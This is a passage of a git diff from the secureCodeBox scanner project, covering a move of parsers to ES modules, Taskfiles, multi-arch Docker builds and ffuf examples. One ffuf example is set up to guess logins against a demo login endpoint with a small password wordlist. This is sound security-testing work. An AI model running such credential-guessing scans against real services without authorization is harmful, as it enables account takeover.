CVE-XXXX-XXXX" @@ -103,5 +109,3 @@ function fetchCVE(references) { } return null; } - -module.exports.parse = parse; diff --git a/scanners/cmseek/parser/parser.test.js b/scanners/cmseek/parser/parser.test.js index a619f2fa9e..0fdfb29448 100644 --- a/scanners/cmseek/parser/parser.test.js +++ b/scanners/cmseek/parser/parser.test.js @@ -2,23 +2,18 @@ // // SPDX-License-Identifier: Apache-2.0 -const fs = require("fs"); -const util = require("util"); +import { readFile } from "fs/promises"; -const readFile = util.promisify(fs.readFile); +import { parse } from "./parser"; -const { parse } = require("./parser"); - -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; test("parser parses result of Joomla scan with core vulnerabilities successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/joomla_with_core_vulns.json", + import.meta.dirname + "/__testFiles__/joomla_with_core_vulns.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(fileContent)); @@ -28,10 +23,10 @@ test("parser parses result of Joomla scan with core vulnerabilities successfully test("parser parses result of Joomla scan without core vulnerabilities successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/joomla_without_core_vulns.json", + import.meta.dirname + "/__testFiles__/joomla_without_core_vulns.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(fileContent)); @@ -41,10 +36,10 @@ test("parser parses result of Joomla scan without core vulnerabilities successfu test("parser parses result of non-Joomla scan successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/not_joomla.json", + import.meta.dirname + "/__testFiles__/not_joomla.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(fileContent)); @@ -54,10 +49,10 @@ test("parser parses result of non-Joomla scan successfully", async () => { test("should properly parse empty cmseek json file", async () => { const jsonContent = await readFile( - __dirname + "/__testFiles__/test-empty-report.json", + import.meta.dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/ffuf/Chart.yaml b/scanners/ffuf/Chart.yaml index 1dda891e69..3502dbeee7 100644 --- a/scanners/ffuf/Chart.yaml +++ b/scanners/ffuf/Chart.yaml @@ -13,7 +13,7 @@ kubeVersion: ">=v1.11.0-0" annotations: versionApi: https://api.github.com/repos/ffuf/ffuf/releases/latest # supported cpu architectures for which docker images for the scanner should be build - supported-platforms: linux/amd64 + supported-platforms: linux/amd64,linux/arm64 keywords: - security - ffuf diff --git a/scanners/ffuf/Makefile b/scanners/ffuf/Makefile deleted file mode 100644 index 25f0bf8946..0000000000 --- a/scanners/ffuf/Makefile +++ /dev/null @@ -1,20 +0,0 @@ -#!/usr/bin/make -fq -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = ffuf -custom_scanner = set - -include ../../scanners.mk - -deploy-test-deps: deploy-test-dep-juiceshop - -integration-tests: - @echo ".: 🩺 Starting integration test in kind namespace 'integration-tests'." - kubectl -n integration-tests delete scans --all - kubectl apply -f ./integration-tests/configmap-wordlist.yaml -n integration-tests - cd $(SCANNERS_DIR) && npm ci && cd $(scanner)/integration-tests && npm run test:integration -- $(scanner)/integration-tests diff --git a/scanners/ffuf/Taskfile.yaml b/scanners/ffuf/Taskfile.yaml new file mode 100644 index 0000000000..b112e9f6e5 --- /dev/null +++ b/scanners/ffuf/Taskfile.yaml @@ -0,0 +1,21 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: ffuf + +tasks: + predeploy: + deps: + - demo-targets:deploy:juice-shop + cmds: + - kubectl apply -f ./integration-tests/configmap-wordlist.yaml -n integration-tests diff --git a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/scan.yaml b/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/scan.yaml index a23b976481..2defe88372 100644 --- a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/scan.yaml +++ b/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/scan.yaml @@ -2,6 +2,20 @@ # # SPDX-License-Identifier: Apache-2.0 +apiVersion: "v1" +kind: ConfigMap +metadata: + name: "ffuf-config" +data: + wordlist.txt: | + blog + 404 + exampleHopefullyNotFound + img/Logo_Black.svg + docs + architecture + +--- apiVersion: "execution.securecodebox.io/v1" kind: Scan metadata: @@ -24,4 +38,3 @@ spec: volumeMounts: - name: "ffuf-config" mountPath: "/config/" - diff --git a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt b/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt deleted file mode 100644 index 59a1b6318b..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt +++ /dev/null @@ -1,6 +0,0 @@ -blog -404 -exampleHopefullyNotFound -img/Logo_Black.svg -docs -architecture diff --git a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt.license b/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-multiple-fuzz-keywords/wordlist.txt.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/scanners/ffuf/examples/wordlist-config-map-post/scan.yaml b/scanners/ffuf/examples/wordlist-config-map-post/scan.yaml index 277f2f0c45..fd973e2cf2 100644 --- a/scanners/ffuf/examples/wordlist-config-map-post/scan.yaml +++ b/scanners/ffuf/examples/wordlist-config-map-post/scan.yaml @@ -1,7 +1,20 @@ # SPDX-FileCopyrightText: the secureCodeBox authors # # SPDX-License-Identifier: Apache-2.0 +apiVersion: "v1" +kind: ConfigMap +metadata: + name: "ffuf-config" +data: + wordlistPasswords.txt: | + password + 123456 + + wordlistUsernames.txt: | + user@example.com + user2@example.com +--- apiVersion: "execution.securecodebox.io/v1" kind: Scan metadata: @@ -22,7 +35,7 @@ spec: - "-H" - "Content-Type: application/json" - "-d" - - "{\"email\":\"USERNAME\",\"password\":\"PASSWORD\"}" + - '{"email":"USERNAME","password":"PASSWORD"}' - "-fc" - 500,401,403 volumes: diff --git a/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt b/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt deleted file mode 100644 index 647edb7b71..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt +++ /dev/null @@ -1,2 +0,0 @@ -password -123456 diff --git a/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt.license b/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-post/wordlistPasswords.txt.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt b/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt deleted file mode 100644 index f8e7af8023..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt +++ /dev/null @@ -1,2 +0,0 @@ -user@example.com -user2@example.com diff --git a/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt.license b/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map-post/wordlistUsernames.txt.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/scanners/ffuf/examples/wordlist-config-map/scan.yaml b/scanners/ffuf/examples/wordlist-config-map/scan.yaml index 144b3f3ab0..abfe943a43 100644 --- a/scanners/ffuf/examples/wordlist-config-map/scan.yaml +++ b/scanners/ffuf/examples/wordlist-config-map/scan.yaml @@ -2,6 +2,16 @@ # # SPDX-License-Identifier: Apache-2.0 +apiVersion: "v1" +kind: ConfigMap +metadata: + name: "ffuf-config" +data: + wordlist.txt: | + blog + 404 + exampleHopefullyNotFound +--- apiVersion: "execution.securecodebox.io/v1" kind: Scan metadata: @@ -22,4 +32,3 @@ spec: volumeMounts: - name: "ffuf-config" mountPath: "/config/" - diff --git a/scanners/ffuf/examples/wordlist-config-map/wordlist.txt b/scanners/ffuf/examples/wordlist-config-map/wordlist.txt deleted file mode 100644 index bc7991405e..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map/wordlist.txt +++ /dev/null @@ -1,3 +0,0 @@ -blog -404 -exampleHopefullyNotFound diff --git a/scanners/ffuf/examples/wordlist-config-map/wordlist.txt.license b/scanners/ffuf/examples/wordlist-config-map/wordlist.txt.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/scanners/ffuf/examples/wordlist-config-map/wordlist.txt.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/scanners/ffuf/integration-tests/ffuf.test.js b/scanners/ffuf/integration-tests/ffuf.test.js index 9669de6358..848c8d8567 100644 --- a/scanners/ffuf/integration-tests/ffuf.test.js +++ b/scanners/ffuf/integration-tests/ffuf.test.js @@ -2,29 +2,36 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( - "FFuf scan with config YAML against 'juiceshop'", + "FFuf scan with config YAML against 'juice-shop'", async () => { const { categories, severities, count } = await scan( - "ffuf-scan-juiceshop-demo", + "ffuf-scan-juice-shop-demo", "ffuf", - ["-u", "http://juiceshop.demo-targets.svc:3000/FUZZ", "-w", "/config/wordlist.txt"], + [ + "-u", + "http://juice-shop.demo-targets.svc:3000/FUZZ", + "-w", + "/config/wordlist.txt", + ], 60 * 2, // volumes - [{ - "name": "ffuf-wordlist-config", - "configMap": {"name": "ffuf-wordlist-config-map"} - }], + [ + { + name: "ffuf-wordlist-config", + configMap: { name: "ffuf-wordlist-config-map" }, + }, + ], // volumeMounts - [{ - "name": "ffuf-wordlist-config", - "mountPath": "/config/wordlist.txt", - "subPath": "wordlist.txt" - }] + [ + { + name: "ffuf-wordlist-config", + mountPath: "/config/wordlist.txt", + subPath: "wordlist.txt", + }, + ], ); // There must be at least one finding @@ -33,8 +40,10 @@ test( "Webserver Content": 2, }); expect(severities).toEqual({ - informational: 2 + informational: 2, }); }, - 60 * 3 * 1000 + { + timeout: 60 * 3 * 1000, + }, ); diff --git a/scanners/ffuf/integration-tests/jest.config.json b/scanners/ffuf/integration-tests/jest.config.json deleted file mode 100644 index 0967ef424b..0000000000 --- a/scanners/ffuf/integration-tests/jest.config.json +++ /dev/null @@ -1 +0,0 @@ -{} diff --git a/scanners/ffuf/integration-tests/jest.config.json.license b/scanners/ffuf/integration-tests/jest.config.json.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/scanners/ffuf/integration-tests/jest.config.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/scanners/ffuf/parser/__testFiles__/juice-shop.json b/scanners/ffuf/parser/__testFiles__/juice-shop.json new file mode 100644 index 0000000000..1ddf81c0bc --- /dev/null +++ b/scanners/ffuf/parser/__testFiles__/juice-shop.json @@ -0,0 +1,126 @@ +{ + "commandline": "ffuf -o /home/securecodebox/ffuf-results.json -u http://juice-shop.demo-targets.svc:3000/FUZZ -w /config/wordlist.txt", + "time": "2025-07-02T08:55:43Z", + "results": [ + { + "input": { + "FFUFHASH": "1", + "FUZZ": "metrics" + }, + "position": 1, + "status": 200, + "length": 22968, + "words": 901, + "lines": 346, + "content-type": "text/plain; version=0.0.4; charset=utf-8", + "redirectlocation": "", + "scraper": {}, + "duration": 2797417, + "resultfile": "", + "url": "http://juice-shop.demo-targets.svc:3000/metrics", + "host": "juice-shop.demo-targets.svc:3000" + }, + { + "input": { + "FFUFHASH": "2", + "FUZZ": "ftp" + }, + "position": 2, + "status": 200, + "length": 11070, + "words": 1568, + "lines": 357, + "content-type": "text/html; charset=utf-8", + "redirectlocation": "", + "scraper": {}, + "duration": 5022084, + "resultfile": "", + "url": "http://juice-shop.demo-targets.svc:3000/ftp", + "host": "juice-shop.demo-targets.svc:3000" + } + ], + "config": { + "autocalibration": false, + "autocalibration_keyword": "FUZZ", + "autocalibration_perhost": false, + "autocalibration_strategies": [ + "basic" + ], + "autocalibration_strings": [], + "colors": false, + "cmdline": "ffuf -o /home/securecodebox/ffuf-results.json -u http://juice-shop.demo-targets.svc:3000/FUZZ -w /config/wordlist.txt", + "configfile": "", + "postdata": "", + "debuglog": "", + "delay": { + "value": "0.00" + }, + "dirsearch_compatibility": false, + "encoders": [], + "extensions": [], + "fmode": "or", + "follow_redirects": false, + "headers": {}, + "ignorebody": false, + "ignore_wordlist_comments": false, + "inputmode": "clusterbomb", + "cmd_inputnum": 100, + "inputproviders": [ + { + "name": "wordlist", + "keyword": "FUZZ", + "value": "/config/wordlist.txt", + "encoders": "", + "template": "" + } + ], + "inputshell": "", + "json": false, + "matchers": { + "IsCalibrated": false, + "Mutex": {}, + "Matchers": { + "status": { + "value": "200-299,301,302,307,401,403,405,500" + } + }, + "Filters": {}, + "PerDomainFilters": {} + }, + "mmode": "or", + "maxtime": 0, + "maxtime_job": 0, + "method": "GET", + "noninteractive": false, + "outputdirectory": "", + "outputfile": "/home/securecodebox/ffuf-results.json", + "outputformat": "json", + "OutputSkipEmptyFile": false, + "proxyurl": "", + "quiet": false, + "rate": 0, + "raw": false, + "recursion": false, + "recursion_depth": 0, + "recursion_strategy": "default", + "replayproxyurl": "", + "requestfile": "", + "requestproto": "https", + "scraperfile": "", + "scrapers": "all", + "sni": "", + "stop_403": false, + "stop_all": false, + "stop_errors": false, + "threads": 40, + "timeout": 10, + "url": "http://juice-shop.demo-targets.svc:3000/FUZZ", + "verbose": false, + "wordlists": [ + "/config/wordlist.txt" + ], + "http2": false, + "client-cert": "", + "client-key": "" + } +} \ No newline at end of file diff --git a/.templates/new-scanner/integration-tests/jest.config.json.license b/scanners/ffuf/parser/__testFiles__/juice-shop.json.license similarity index 100% rename from .templates/new-scanner/integration-tests/jest.config.json.license rename to scanners/ffuf/parser/__testFiles__/juice-shop.json.license diff --git a/scanners/ffuf/parser/parser.js b/scanners/ffuf/parser/parser.js index 0b81a625d6..1a1de9a8de 100644 --- a/scanners/ffuf/parser/parser.js +++ b/scanners/ffuf/parser/parser.js @@ -2,41 +2,42 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { +export async function parse(fileContent) { + if (!fileContent) { + return []; + } - if (!fileContent || !fileContent.results || fileContent.results.length == 0) { + const report = JSON.parse(fileContent); + if (!report.results || report.results.length == 0) { return []; } - return fileContent.results.map(result => { - const time = new Date(fileContent.time).toISOString(); - return { - name: 'Webserver Content', - description: `Content [${result.input ? Object.values(result.input) : ""}] was found on the webserver ${result.host}.`, // todo rn: what if no FUZZ keyword is used?? - identified_at: time, - osi_layer: 'APPLICATION', - severity: 'INFORMATIONAL', - category: 'Webserver Content', - attributes: { - httpStatus: result.status, - length: result.length, - words: result.words, - lines: result.lines, - contentType: result["content-type"], - redirectlocation: result.redirectlocation, - duration: result.duration, - // resultFile = the name of the file containing the full request and response, - // SCB does currently not implement saving the file (because data might be large) - // resultFile: result.resultfile, - hostname: result.host, - input: result.input, - // FUZZ keywords can also be in headers -> we should see that within the result - postdata: fileContent?.config?.postdata, - // FUZZ keywords can also be in headers -> we should see that within the result - headers: fileContent?.config?.headers, - }, - location: result.url, - } - }); -} -module.exports.parse = parse; + const time = new Date(report.time).toISOString(); + return report.results.map((result) => ({ + name: "Webserver Content", + description: `Content [${result.input ? Object.values(result.input) : ""}] was found on the webserver ${result.host}.`, // todo rn: what if no FUZZ keyword is used?? + identified_at: time, + osi_layer: "APPLICATION", + severity: "INFORMATIONAL", + category: "Webserver Content", + attributes: { + httpStatus: result.status, + length: result.length, + words: result.words, + lines: result.lines, + contentType: result["content-type"], + redirectlocation: result.redirectlocation, + duration: result.duration, + // resultFile = the name of the file containing the full request and response, + // SCB does currently not implement saving the file (because data might be large) + // resultFile: result.resultfile, + hostname: result.host, + input: result.input, + // FUZZ keywords can also be in headers -> we should see that within the result + postdata: report?.config?.postdata, + // FUZZ keywords can also be in headers -> we should see that within the result + headers: report?.config?.headers, + }, + location: result.url, + })); +} diff --git a/scanners/ffuf/parser/parser.test.js b/scanners/ffuf/parser/parser.test.js index f886d6f505..a00a0eb604 100644 --- a/scanners/ffuf/parser/parser.test.js +++ b/scanners/ffuf/parser/parser.test.js @@ -2,18 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const {parse} = require("./parser"); +import { parse } from "./parser"; test("should properly parse ffuf json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/ffuf-results.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/ffuf-results.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); // validate findings @@ -73,14 +72,13 @@ test("should properly parse ffuf json file", async () => { }); test("should properly parse ffuf json file wih multiple fuzz keyword inputs", async () => { - const fileContent = JSON.parse( - await readFile( - __dirname + "/__testFiles__/ffuf-results-multiple-fuzz-keywords.json", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + __dirname + "/__testFiles__/ffuf-results-multiple-fuzz-keywords.json", + { + encoding: "utf8", + }, ); + const findings = await parse(fileContent); // validate findings await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -116,10 +114,11 @@ test("should properly parse ffuf json file wih multiple fuzz keyword inputs", as }); test("should properly parse ffuf json file with postdata", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/ffuf-results-postdata.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/ffuf-results-postdata.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); // validate findings @@ -158,22 +157,87 @@ test("should properly parse ffuf json file with postdata", async () => { }); test("should properly parse empty json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/empty.json", { + const fileContent = await readFile(__dirname + "/__testFiles__/empty.json", { + encoding: "utf8", + }); + const findings = await parse(fileContent); + // validate findings + await expect(validateParser(findings)).resolves.toBeUndefined(); + expect(findings).toMatchInlineSnapshot(`[]`); +}); + +test("should properly parse juice-shop findings json file", async () => { + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); // validate findings await expect(validateParser(findings)).resolves.toBeUndefined(); - expect(findings).toMatchInlineSnapshot(`[]`); + expect(findings).toMatchInlineSnapshot(` + [ + { + "attributes": { + "contentType": "text/plain; version=0.0.4; charset=utf-8", + "duration": 2797417, + "headers": {}, + "hostname": "juice-shop.demo-targets.svc:3000", + "httpStatus": 200, + "input": { + "FFUFHASH": "1", + "FUZZ": "metrics", + }, + "length": 22968, + "lines": 346, + "postdata": "", + "redirectlocation": "", + "words": 901, + }, + "category": "Webserver Content", + "description": "Content [1,metrics] was found on the webserver juice-shop.demo-targets.svc:3000.", + "identified_at": "2025-07-02T08:55:43.000Z", + "location": "http://juice-shop.demo-targets.svc:3000/metrics", + "name": "Webserver Content", + "osi_layer": "APPLICATION", + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "contentType": "text/html; charset=utf-8", + "duration": 5022084, + "headers": {}, + "hostname": "juice-shop.demo-targets.svc:3000", + "httpStatus": 200, + "input": { + "FFUFHASH": "2", + "FUZZ": "ftp", + }, + "length": 11070, + "lines": 357, + "postdata": "", + "redirectlocation": "", + "words": 1568, + }, + "category": "Webserver Content", + "description": "Content [2,ftp] was found on the webserver juice-shop.demo-targets.svc:3000.", + "identified_at": "2025-07-02T08:55:43.000Z", + "location": "http://juice-shop.demo-targets.svc:3000/ftp", + "name": "Webserver Content", + "osi_layer": "APPLICATION", + "severity": "INFORMATIONAL", + }, + ] + `); }); test("should properly parse zero findings json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/zeroFindings.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/zeroFindings.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); // validate findings diff --git a/scanners/ffuf/scanner/Dockerfile b/scanners/ffuf/scanner/Dockerfile index afca9102b5..cf06ccb103 100644 --- a/scanners/ffuf/scanner/Dockerfile +++ b/scanners/ffuf/scanner/Dockerfile @@ -2,14 +2,17 @@ # # SPDX-License-Identifier: Apache-2.0 -# Write your dockerfile for the scanner ffuf here -# Alternatively, you can use an existing image from docker-hub -FROM golang:1.19-alpine +FROM --platform=$BUILDPLATFORM golang:1.24-alpine AS builder ARG scannerVersion -RUN go install github.com/ffuf/ffuf/v2@$scannerVersion -RUN addgroup --system --gid 1001 ffuf && adduser ffuf --system --uid 1001 --ingroup ffuf -RUN mkdir -p /home/ffuf/.config/ffuf && chown -R ffuf:ffuf /home/ffuf/.config/ffuf -RUN mkdir -p /home/ffuf/.config/ffuf/scraper && chown -R ffuf:ffuf /home/ffuf/.config/ffuf/scraper -USER 1001 +RUN GOOS=$TARGETOS GOARCH=$TARGETARCH CGO_ENABLED=0 go install github.com/ffuf/ffuf/v2@$scannerVersion -CMD ["ffuf"] +RUN mkdir -p /home/ffuf/.config/ffuf +RUN mkdir -p /home/ffuf/.config/ffuf/scraper + +FROM gcr.io/distroless/static-debian12:nonroot +COPY --from=builder --chown=root:root --chmod=755 /go/bin/ffuf /usr/local/bin/ffuf +COPY --from=builder --chown=nonroot:nonroot /home/ffuf/.config/ffuf /home/nonroot/.config/ffuf + +WORKDIR /home/nonroot + +ENTRYPOINT ["/usr/local/bin/ffuf"] diff --git a/scanners/git-repo-scanner/Chart.yaml b/scanners/git-repo-scanner/Chart.yaml index 1443a59345..39f5f8b68d 100644 --- a/scanners/git-repo-scanner/Chart.yaml +++ b/scanners/git-repo-scanner/Chart.yaml @@ -13,7 +13,7 @@ appVersion: "1.1" kubeVersion: ">=v1.11.0-0" annotations: # supported cpu architectures for which docker images for the scanner should be build - supported-platforms: linux/amd64 + supported-platforms: linux/amd64,linux/arm64 keywords: - git diff --git a/scanners/git-repo-scanner/Makefile b/scanners/git-repo-scanner/Makefile deleted file mode 100644 index 35dd0be3d4..0000000000 --- a/scanners/git-repo-scanner/Makefile +++ /dev/null @@ -1,25 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = git-repo-scanner -custom_scanner = set - -include ../../scanners.mk - -.PHONY: unit-tests -unit-tests: - @$(MAKE) -s unit-test-py - -.PHONY: integration-tests -integration-tests: - @echo ".: 🩺 Starting integration test in kind namespace 'integration-tests'." - @echo "Disabled due to performance." - #kubectl -n integration-tests delete scans --all - #cd ../../tests/integration/ && npm ci - #cd ../../scanners/${scanner} - #npm run test:integration -- ${scanner}/integration-tests diff --git a/scanners/git-repo-scanner/Taskfile.yaml b/scanners/git-repo-scanner/Taskfile.yaml new file mode 100644 index 0000000000..a7b2ce668b --- /dev/null +++ b/scanners/git-repo-scanner/Taskfile.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: git-repo-scanner + +tasks: {} diff --git a/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js b/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js index 86f86aba00..7815274085 100644 --- a/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js +++ b/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js @@ -2,12 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); +import { scan } from "../../../tests/integration/helpers.js"; -jest.retryTimes(3); - -test( - "gitleaks should find at least 1 repository in the GitHub secureCodeBox organisation", +test.skip( + "git-repo-scanner should find at least 1 repository in the GitHub secureCodeBox organisation", async () => { // This integration tests runs about 30min because of the GitHub Public API call rate limit. // If you want to speed up you need to add an valid access token like: ['--git-type', 'github', '--organization', 'secureCodeBox', '--access-token', '23476VALID2345TOKEN'], @@ -15,10 +13,12 @@ test( "git-repo-scanner-dummy-scan", "git-repo-scanner", ["--git-type", "github", "--organization", "secureCodeBox"], - 90 + 90, ); // There must be >= 28 Repositories found in the GitHub secureCodeBox organisation. expect(count).toBeGreaterThanOrEqual(28); }, - 3 * 60 * 1000 + { + timeout: 3 * 60 * 1000, + }, ); diff --git a/scanners/git-repo-scanner/parser/parser.js b/scanners/git-repo-scanner/parser/parser.js index e83798c422..c65ade4372 100644 --- a/scanners/git-repo-scanner/parser/parser.js +++ b/scanners/git-repo-scanner/parser/parser.js @@ -2,8 +2,6 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse (fileContent) { - return fileContent +export async function parse(fileContent) { + return JSON.parse(fileContent) || []; } - -module.exports.parse = parse; diff --git a/scanners/git-repo-scanner/parser/parser.test.js b/scanners/git-repo-scanner/parser/parser.test.js index c473e15a20..3180436f75 100644 --- a/scanners/git-repo-scanner/parser/parser.test.js +++ b/scanners/git-repo-scanner/parser/parser.test.js @@ -2,23 +2,21 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("should properly parse empty json file", async () => { const fileContent = await readFile( __dirname + "/__testFiles__/empty-findings.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(fileContent)); + const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); - expect(findings).toMatchInlineSnapshot(`Array []`); + expect(findings).toMatchInlineSnapshot(`[]`); }); test("should properly parse git-scanner json file", async () => { @@ -26,14 +24,14 @@ test("should properly parse git-scanner json file", async () => { __dirname + "/__testFiles__/git-scanner-test-findings.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(fileContent)); + const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` - Array [ - Object { - "attributes": Object { + [ + { + "attributes": { "created_at": "2017-02-02T09:48:05Z", "full_name": "secureCodeBox/secureCodeBox", "id": 80711933, @@ -50,8 +48,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-03-01T10:50:05Z", "full_name": "secureCodeBox/engine", "id": 123422137, @@ -68,8 +66,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-03-08T14:20:36Z", "full_name": "secureCodeBox/scanner-infrastructure-nmap", "id": 124402117, @@ -86,8 +84,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-03-20T15:48:39Z", "full_name": "secureCodeBox/nodejs-scanner-scaffolding", "id": 126042943, @@ -104,8 +102,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-04-06T13:13:14Z", "full_name": "secureCodeBox/scanner-webserver-nikto", "id": 128396681, @@ -122,8 +120,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-04-10T11:17:29Z", "full_name": "secureCodeBox/scanner-webapplication-zap", "id": 128920739, @@ -140,8 +138,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-05-15T11:43:11Z", "full_name": "secureCodeBox/scanner-infrastructure-sslyze", "id": 133507929, @@ -158,8 +156,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-05-24T06:47:00Z", "full_name": "secureCodeBox/scanner-webapplication-arachni", "id": 134673181, @@ -176,8 +174,8 @@ test("should properly parse git-scanner json file", async () => { "osi_layer": "APPLICATION", "severity": "INFORMATIONAL", }, - Object { - "attributes": Object { + { + "attributes": { "created_at": "2018-07-18T16:38:18Z", "full_name": "secureCodeBox/scanner-infrastructure-amass", "id": 141462466, @@ -194,8 +192,8 @@ test("should properly 